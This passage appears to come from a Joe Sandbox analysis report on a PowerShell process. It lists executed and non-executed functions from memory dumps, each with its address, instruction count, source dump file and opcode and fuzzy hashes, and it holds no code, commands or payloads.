Instruction Fuzzy Hash: 056178B2D0CA894FE755EB3DC8556FA7BE2EFA5320F04017FD049C7292DB2668468741

Function 00007FFB1115059D Relevance: 1.7, Strings: 1, Instructions: 483
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H, xrefs: 00007FFB1116F5D9

Memory Dump Source

Source File: 0000000B.00000002.1784258536.00007FFB11150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb11150000_powershell.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: 8ba8e70e69a7f462fce39f8ec69fe9b46cc71168133f06fcf1f8ff77e365e33f
Instruction ID: 1e655833b12f3422525c84aff8fb9a423f91fd14bc5fc4cd7fea61272e326a24
Opcode Fuzzy Hash: 8ba8e70e69a7f462fce39f8ec69fe9b46cc71168133f06fcf1f8ff77e365e33f
Instruction Fuzzy Hash: 2DE1B3B161CF464FE798EA3CC455679B7D2EF9A360F54017DE08DC3282DE29A852C782

Function 00007FFB10EB7D0A Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNEL32 ref: 00007FFB10EB7D97

Memory Dump Source

Source File: 0000000B.00000002.1779361963.00007FFB10EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb10eb0000_powershell.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9e8ee03ff0349437bc0c058f0370b31260f2409a3d1c0d31e21f6c859f03d96d
Instruction ID: ca6fc030210a2f988a29de900155f498129351a8f35393bafa1dc7054bdf13f7
Opcode Fuzzy Hash: 9e8ee03ff0349437bc0c058f0370b31260f2409a3d1c0d31e21f6c859f03d96d
Instruction Fuzzy Hash: 82315E71908A1C8FDB58DB6CD849AFABBF1FF59321F04422BD04AD3651DB71A8158B81

Function 00007FFB10EB7CF9 Relevance: 1.6, APIs: 1, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNEL32 ref: 00007FFB10EB7D97

Memory Dump Source

Source File: 0000000B.00000002.1779361963.00007FFB10EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb10eb0000_powershell.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e1a5827dbc8b36f8acd3689c36d00fafddeb7c7d914abd6cb63837f80beab9c2
Instruction ID: 4d8200f81064d77bbf039525bb32d892eaa50b8489e2000c4c2f79eb74b6e1ac
Opcode Fuzzy Hash: e1a5827dbc8b36f8acd3689c36d00fafddeb7c7d914abd6cb63837f80beab9c2
Instruction Fuzzy Hash: 23218E7290CA4D8FDB59DBA8D445BE9BBF0FF29320F04426BC049D3652CB75A8458B81

Function 00007FFB1115000A Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1784258536.00007FFB11150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb11150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fcbd679c3a78d2f41543ea3ddb466510ef5a2e58453253081adc6d54d7ee169
Instruction ID: 2769b0fbc355bf06817dafd7961b527c86ff7541879ffe8f41ead288c52514ad
Opcode Fuzzy Hash: 9fcbd679c3a78d2f41543ea3ddb466510ef5a2e58453253081adc6d54d7ee169
Instruction Fuzzy Hash: 839107A291DFC64FE3469738C8615B5BBE2EF57320B4940FBD089CB297DD1CA8468342

Function 00007FFB1115756F Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1784258536.00007FFB11150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb11150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a7713b9882ccdaa5cca2c0a52b0a309247df3a4a0dd061c0fe665f2080122d6
Instruction ID: afa7f6f9f98aa139bbf2404287ebe3443027a1d5f9ce07baf8ca9e2400f80bcf
Opcode Fuzzy Hash: 4a7713b9882ccdaa5cca2c0a52b0a309247df3a4a0dd061c0fe665f2080122d6
Instruction Fuzzy Hash: 43A1F0B1E2891A4FEB94EB6CC499BA973A2FF98340F5101F9D00DD7796CE386D418B41

Function 00007FFB11210C01 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1785793579.00007FFB11210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb11210000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59acc4a0a80d0505ac6d6dd3ce6a9b2752ed918c5ce5990ac7de30797814d7f4
Instruction ID: f54370bfe1245a92839d076f21f1c85b0feaea42cf6c1f122518fead12f8a93f
Opcode Fuzzy Hash: 59acc4a0a80d0505ac6d6dd3ce6a9b2752ed918c5ce5990ac7de30797814d7f4
Instruction Fuzzy Hash: 5A51B5A2A0EBC58FE357E77888551647FA2EF5626074D00FBD088CB1E3E80D6C458396

Function 00007FFB11171060 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1784258536.00007FFB11150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb11150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b59b940b28c5ae90a0d1d6cae2ec21d3cf2e6932c27888f517c524d9e34b088
Instruction ID: 406e3806f3f0fcade9ac2b5c134bafe03444814244b69021fa420fe2f078406f
Opcode Fuzzy Hash: 7b59b940b28c5ae90a0d1d6cae2ec21d3cf2e6932c27888f517c524d9e34b088
Instruction Fuzzy Hash: 8341F5A2A28D470FF344E73CC4856B5B7D2FF98360B44057AE04EC3786DE29B8428781

Function 00007FFB111505CD Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1784258536.00007FFB11150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb11150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb4e4a318f926d7dbb9dc799df5e81ac6d4277b0a7078eaad2b2f5af87246f4e
Instruction ID: 8c57ff8150ee366a21011878139e8d1497fe6b1e7763710f98a6773b80f0478b
Opcode Fuzzy Hash: eb4e4a318f926d7dbb9dc799df5e81ac6d4277b0a7078eaad2b2f5af87246f4e
Instruction Fuzzy Hash: 2341C77161CF054BE758A62CE8066B973D6EBD9720F50057EE48EC3282DE25BC5287C2

Function 00007FFB11151DE8 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1784258536.00007FFB11150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb11150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf295c1476b7adb6f57a106d2a1b260b0b51382e342423af7f1dec62913d0fc4
Instruction ID: 4e7a2ad55c05cc326b256cf2dffb63ef3b149ab03b3d219861a183982567d14d
Opcode Fuzzy Hash: cf295c1476b7adb6f57a106d2a1b260b0b51382e342423af7f1dec62913d0fc4
Instruction Fuzzy Hash: AC414BF381CA865FF785EF78C8521E5BBA1FF56354B08407AE049CB183DB28A8569781

Function 00007FFB1116A870 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1784258536.00007FFB11150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb11150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8b921e5d0e1e14a0915a63080f4e8e90e0f86c6b8026addeb375cde225514d5
Instruction ID: 015af92058bb42896ebb545ac71570af67841639e35a84caf5ac60e00e47e916
Opcode Fuzzy Hash: e8b921e5d0e1e14a0915a63080f4e8e90e0f86c6b8026addeb375cde225514d5
Instruction Fuzzy Hash: 1621FBB290CF484BFB48DA1CE8595B87FD6EFD9724F54006EF58DC3292D9246812C386

Function 00007FFB11151E70 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1784258536.00007FFB11150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb11150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c63512da8c7cc9aa91c7904de10b1ac7590026aea963fab6cfa49bfa301b8d7d
Instruction ID: 9e9eb2133e2ab76856be12b50b540dd586b5fac0f9c3eb7e3339770c422b6976
Opcode Fuzzy Hash: c63512da8c7cc9aa91c7904de10b1ac7590026aea963fab6cfa49bfa301b8d7d
Instruction Fuzzy Hash: 57313AB292494A8FE784EF24C4455AAB7A2FF95300F95417EE40ECB295CB35AC52CBC1

Function 00007FFB11210CF1 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1785793579.00007FFB11210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb11210000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2b59f5e37a7f23e29a470152ae0383f3efea344544782a164e3a7d380478cbe
Instruction ID: d7e9bed014950c0951d226ad3bf4a4db793296800e617cedebd74da3a11196b3
Opcode Fuzzy Hash: e2b59f5e37a7f23e29a470152ae0383f3efea344544782a164e3a7d380478cbe
Instruction Fuzzy Hash: AA2163D2D0EBD14FE367A77448660A47FA5DF17220B8E40EBD088CB1E3D84D79468396

Function 00007FFB111520FE Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1784258536.00007FFB11150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb11150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdd1126b7e610199e2d0156da325d33dc4138426aa292dcf929206206ad32074
Instruction ID: 3bd1bd05bd337632bfca5ee83b9a46de7ef6a259a4a0c45e3526093515f8d68a
Opcode Fuzzy Hash: cdd1126b7e610199e2d0156da325d33dc4138426aa292dcf929206206ad32074
Instruction Fuzzy Hash: 4C21B3A285DAC64FE7829B78C8555EA7FB1EF47210F0A40F7E059CB1A3CE2C59058742

Function 00007FFB11150568 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1784258536.00007FFB11150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb11150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 416b1c24a3c704214b60634ccc1dafba7c317ae90a0f59d740abb447b47cb644
Instruction ID: af6e89442dc650ccfd2156c949958a5282e376ec47f4bf56fc778039316ef534
Opcode Fuzzy Hash: 416b1c24a3c704214b60634ccc1dafba7c317ae90a0f59d740abb447b47cb644
Instruction Fuzzy Hash: 28018821B59D0D07F698A63DAC452B9B3C6DB89335F900176E80DC7386DC5AA9928280

Function 00007FFB112C40ED Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b841565a97f22a99d9f3d052152768869c9ecfcf0758af5e4bd66ccc39366f20
Instruction ID: 448ba9f5eea2400f8fc262eaaac8a190771cea1946254fce973610c2edf22227
Opcode Fuzzy Hash: b841565a97f22a99d9f3d052152768869c9ecfcf0758af5e4bd66ccc39366f20
Instruction Fuzzy Hash: 40119E75A0CD088FEB4CEA2CD0416B9B3E2EB99324B50467DD55FC3296DE35E80287C0

Function 00007FFB112B9B0D Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54fa9ecd39b84681ec432d7e5d729129b0695c0f9457e5972411d2c95400a695
Instruction ID: 5db59725a1efc6638a45722bc240f613f06a39976e3c00a93db94186ef90e14c
Opcode Fuzzy Hash: 54fa9ecd39b84681ec432d7e5d729129b0695c0f9457e5972411d2c95400a695
Instruction Fuzzy Hash: FBF02291A1CC690FEBA1F73C98546B07BD6DF86210B4940F9E48DCB2E2F90DEC858384

Function 00007FFB112B0213 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bd64728b6245d4caa4063750830e1fe8b0dcab911d693054d21c236b0ace23e
Instruction ID: 9ff78ded4bbee37b44f68ec66f2ef243d1e51879fa2d82f5cf8dd5ed2a1b6c93
Opcode Fuzzy Hash: 2bd64728b6245d4caa4063750830e1fe8b0dcab911d693054d21c236b0ace23e
Instruction Fuzzy Hash: A8D0127364E61649B3182118FC430F8B388D642131B91697FD24680953ED4B64B344C9

Non-executed Functions

Function 00007FFB11679C67 Relevance: 4.5, Strings: 3, Instructions: 785COMMON

Download Yara Rule

Strings

Hm, xrefs: 00007FFB1167A260
y, xrefs: 00007FFB1167A34C
Hm, xrefs: 00007FFB1167A2A8

Memory Dump Source

Source File: 0000000B.00000002.1801701200.00007FFB11670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb11670000_powershell.jbxd

Similarity

API ID:
String ID: Hm$Hm$y
API String ID: 0-3072798159
Opcode ID: a74548ab54b090b7efb216491e8f99e71356b020f38f4e6021deb315da7dc3f4
Instruction ID: d13c326e1ed49f9dc03dc9a4e30252d38e3b92e984a4dec33b4e9437b4c2e822
Opcode Fuzzy Hash: a74548ab54b090b7efb216491e8f99e71356b020f38f4e6021deb315da7dc3f4
Instruction Fuzzy Hash: A82209A2B1CE4A4FF7989A7C981527977C3EF99360B54417EE44EC32CBDD19AC424381

Function 00007FFB10EBC6A0 Relevance: 3.2, Strings: 2, Instructions: 699COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFB10EBC709
zN, xrefs: 00007FFB10EBC99E

Memory Dump Source

Source File: 0000000B.00000002.1779361963.00007FFB10EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb10eb0000_powershell.jbxd

Similarity

API ID:
String ID: _$zN
API String ID: 0-951513177
Opcode ID: c22d4147c1a34b0d5c84c35b2ba74a9dc7ded75bfd2bf8cf99cd364837a8b76e
Instruction ID: d1e0bc7ca88155c41d87ab1cdffd538bc41b2e6d0e8b7f794440bc6ae0ae6286
Opcode Fuzzy Hash: c22d4147c1a34b0d5c84c35b2ba74a9dc7ded75bfd2bf8cf99cd364837a8b76e
Instruction Fuzzy Hash: 5312D2E7F1C92A55F211B67FF4422FE6B41DFC83B6B010037E249C92839F58B49662A1

Function 00007FFB10EBEEA8 Relevance: 2.8, Strings: 1, Instructions: 1535COMMON

Download Yara Rule

Strings

;M_H, xrefs: 00007FFB10ECE984

Memory Dump Source

Source File: 0000000B.00000002.1779361963.00007FFB10EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb10eb0000_powershell.jbxd

Similarity

API ID:
String ID: ;M_H
API String ID: 0-990393878
Opcode ID: c212aca59911eb408275b53e5ac2f8a3cda264ed9f04df5140066765d12d6a33
Instruction ID: fff8379f0fdfa44ea538c98eee5ebf7ab269716cd5e070a235c88cbbfe5173e9
Opcode Fuzzy Hash: c212aca59911eb408275b53e5ac2f8a3cda264ed9f04df5140066765d12d6a33
Instruction Fuzzy Hash: D9C26771A3484B9FE248EB2CC4506A6F352FF95344F95427AE00AC7B86DF79B85287C1

Function 00007FFB10EB2028 Relevance: 2.5, Strings: 1, Instructions: 1294COMMON

Download Yara Rule

Strings

JK_H, xrefs: 00007FFB10EEDA7E

Memory Dump Source

Source File: 0000000B.00000002.1779361963.00007FFB10EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb10eb0000_powershell.jbxd

Similarity

API ID:
String ID: JK_H
API String ID: 0-3959852381
Opcode ID: a13a5d62e4556bf5df3cce7d9d2f719872aff9a9aa4c24d9daee69be4a459877
Instruction ID: 9f3dec803f2231358b7bca2d35c4c84be6841ae703176842d9e08831eb32142b
Opcode Fuzzy Hash: a13a5d62e4556bf5df3cce7d9d2f719872aff9a9aa4c24d9daee69be4a459877
Instruction Fuzzy Hash: BC82F6A3E1CD8D4FE798EA2C98556BA37C2EFA83A4B0401BAE08DC77D7DD156D054381

Function 00007FFB11678118 Relevance: 1.2, Instructions: 1151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1801701200.00007FFB11670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb11670000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e25da1aa3b3691e54b3d9dbaae7ff9128d9eb85738c8797abfd5629d2f477124
Instruction ID: 4746aa7a3453e933bd33bcf69af5c430864f31d274f00e3de99eac8b348ded2f
Opcode Fuzzy Hash: e25da1aa3b3691e54b3d9dbaae7ff9128d9eb85738c8797abfd5629d2f477124
Instruction Fuzzy Hash: 2D72E5A1A1CE4A4FE798EB7CC8556B977D6FF58320F5401B9D00EC328ADE29AC41C791

Function 00007FFB118D000A Relevance: 1.0, Instructions: 965COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1804312691.00007FFB118D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB118D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb118d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21ae55ccb8b198842e9cdb0e875769a5b6c4db4807371f3271a79966ea3a9a50
Instruction ID: 5fb4c596073d645ec4c80e7153bde278053f8efe2ffc62a9b0cbe7e85b0d2d5e
Opcode Fuzzy Hash: 21ae55ccb8b198842e9cdb0e875769a5b6c4db4807371f3271a79966ea3a9a50
Instruction Fuzzy Hash: CB52A4A1B1CE494FE798EB3CD4556B977D2EF98310F1441BAE04DC7297DE28AC428782

Function 00007FFB115005BE Relevance: .9, Instructions: 914COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1799617923.00007FFB11500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb11500000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 180b59665d9e80535ed84231c8f18462054b45007902961316bbca351c28180b
Instruction ID: 44e431504b1ee46cc04778740e5217af478234d3e6f20d7421b6bccbab2ce158
Opcode Fuzzy Hash: 180b59665d9e80535ed84231c8f18462054b45007902961316bbca351c28180b
Instruction Fuzzy Hash: 10627371B1CA458FE7A4EB78C8597AAB7D2EFD8301F50457DE08DC32A6DE34A8418742

Function 00007FFB118E04B8 Relevance: .8, Instructions: 779COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1804312691.00007FFB118D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB118D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb118d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4525f17c682ad465b43d8012fc3670f4c1444b3438a4a4cb8b60951fed0a0621
Instruction ID: 4166ac8fcd3860f0243d99e1b694620e74ec53d7be940c96ec159f41b7d96d48
Opcode Fuzzy Hash: 4525f17c682ad465b43d8012fc3670f4c1444b3438a4a4cb8b60951fed0a0621
Instruction Fuzzy Hash: 482213A1B1DA4A4BF358EA3C985527973C2EF95314F6485BDE48EC72C7DD28AC438381

Function 00007FFB11518250 Relevance: .7, Instructions: 730COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1799617923.00007FFB11500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb11500000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4087cb948354e57f6f4bace62f7df99f597ef1b552ccffa138c6c54cc5d1c670
Instruction ID: e7158008988bfaa5bca6a36eea1d9bda082af2fe9007379cfc78f236ab24291d
Opcode Fuzzy Hash: 4087cb948354e57f6f4bace62f7df99f597ef1b552ccffa138c6c54cc5d1c670
Instruction Fuzzy Hash: 8D3238B1A1CE068FE789EB3CC4562B5B3D2EF99310F5441BED04EC7297DE2968068742

Function 00007FFB11150DF8 Relevance: .6, Instructions: 566COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1784258536.00007FFB11150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb11150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d933ed506f2449622a86a747a1aec874c18ace9bcf4f8b7f877b785e71bf5e0e
Instruction ID: 1e0f578c57b478746aaaa72916058fd6666652d08897ca704fe64bd6eaea66a3
Opcode Fuzzy Hash: d933ed506f2449622a86a747a1aec874c18ace9bcf4f8b7f877b785e71bf5e0e
Instruction Fuzzy Hash: 5202A5A1B1CE454BF358AB7CC8156A5B7D2EF98710F1486BEE44DC72C7DE28AC028785

Function 00007FFB11507AE0 Relevance: .5, Instructions: 520COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1799617923.00007FFB11500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb11500000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03665c29c71a36eafc55034bdd050f7b03f9f250522a35da46261de522eca6f0
Instruction ID: d05a37d981e6e8b7c54c563c4a92fd6eeb65b2bec0e271cfad5cf64505867ca3
Opcode Fuzzy Hash: 03665c29c71a36eafc55034bdd050f7b03f9f250522a35da46261de522eca6f0
Instruction Fuzzy Hash: 39E13672A1CE4A4FE759AB7CC8052B1B7D6FF55320F1445BED08EC71A2DE29AC428781

Function 00007FFB1115129C Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1784258536.00007FFB11150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb11150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33f2611d00f235e342a9373fc6e847fd7af7fed53b0341e5df5dc7de9f56dc92
Instruction ID: 2a796a80b7e4a1fc4f84ef2372f74ad5a6fedeea9967f0002307d5e593aaa5f4
Opcode Fuzzy Hash: 33f2611d00f235e342a9373fc6e847fd7af7fed53b0341e5df5dc7de9f56dc92
Instruction Fuzzy Hash: F8F1C7A2A3CD464FF749AB38C4526F6B392FF55310F54417AE05EC3687DE28B8068741

Function 00007FFB11671065 Relevance: .5, Instructions: 467COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1801701200.00007FFB11670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB11670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb11670000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6038b1f671a7e61e9c728cc842ad4498947e1b1d637c96be1c18e5fb4f47dbb2
Instruction ID: db44be7d943e64fd3ae9f46b0e23c97f81df31473d747d4379785987057af53d
Opcode Fuzzy Hash: 6038b1f671a7e61e9c728cc842ad4498947e1b1d637c96be1c18e5fb4f47dbb2
Instruction Fuzzy Hash: AED1E4B0A1CE054BE758DA2CD85167533D6EF99314F3440BDE68EC72D2EE26EC428786

Function 00007FFB112BC8AF Relevance: .5, Instructions: 462COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56bd39fc78ca1d6b1f41959d0e1a27731ce0732d906060bdeb8ef3d8b8b8d2a8
Instruction ID: 89b8b58cb6956e069d81272462818637236d93160fc306713f8df7f3416c0a99
Opcode Fuzzy Hash: 56bd39fc78ca1d6b1f41959d0e1a27731ce0732d906060bdeb8ef3d8b8b8d2a8
Instruction Fuzzy Hash: 20D1D87072894A4FE358EB3CC41567AB3D3EBC9314B61C6BED05AC7296DE39A8468341

Function 00007FFB112C4B47 Relevance: .5, Instructions: 457COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0002942d1d509ee6a7305948ec78a1a8b731cf716fa3890b4c80cc7963b55ba
Instruction ID: 879a7c1d21d80623d78f36f7397d7838af7ff1774398aad29a26d4f19e574ba8
Opcode Fuzzy Hash: b0002942d1d509ee6a7305948ec78a1a8b731cf716fa3890b4c80cc7963b55ba
Instruction Fuzzy Hash: AAE12F70A18A094FE798EB38C05527AB3D3FBC9325F644A79D04EC7396DE39D8428741

Function 00007FFB112BC705 Relevance: .4, Instructions: 399COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09f6ec927d7e48e6e5258f5c68f0848e23c6e797ef6ed41e945cc2e075dd4f64
Instruction ID: c1c05308b6eb0d686d7ff74f7a5f3fae1a8afe7e8b59714211eb76f119842c75
Opcode Fuzzy Hash: 09f6ec927d7e48e6e5258f5c68f0848e23c6e797ef6ed41e945cc2e075dd4f64
Instruction Fuzzy Hash: 4EC16A71A1CA464FE359A73CC4152B6BBE2FF8A314F1485BFD04AC76D3DE29A8468341

Function 00007FFB10EB2038 Relevance: .3, Instructions: 339COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1779361963.00007FFB10EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb10eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd94d0d40aff03e6393e2b9e4d59ff9374da1a3c022b46eae9b28ae5723c2fef
Instruction ID: 84518cf0db298d6c675c68eac3b5b5ea58f05f1140ccc3d4bd7a9e8d998742a8
Opcode Fuzzy Hash: fd94d0d40aff03e6393e2b9e4d59ff9374da1a3c022b46eae9b28ae5723c2fef
Instruction Fuzzy Hash: 75A119A3E1CD4D4FE798EA7CC8456BA73D2EFA8360F0442BAE04EC7392DD2558418380

Function 00007FFB112BB36D Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1793486464.00007FFB112B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB112B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb112b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd96b4976d1f42a07f79b66c53e5b15b56c920c841cd29b975693ace8e6f2b89
